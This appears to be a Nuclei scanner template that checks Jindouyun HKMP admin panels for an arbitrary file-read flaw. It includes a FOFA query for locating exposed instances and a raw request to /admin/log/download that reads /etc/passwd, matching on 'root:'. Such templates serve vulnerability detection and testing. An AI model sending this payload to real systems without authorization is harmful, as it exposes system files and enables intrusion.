id: jindouyun-HKMP-download-fileread

info:
  name: jindouyun-HKMP-download-fileread
  author: lengmo
  severity: high
  description: jindouyun-HKMP-download-fileread
  tags: Fileread
  metadata:
    fofa-qeury: body="金斗云 Copyright"

    veified: true
    max-request: 1

http:
  - raw:
      - |
        GET /admin/log/download?file=/etc/passwd HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root:'
      - type: status
        status: 
          - 200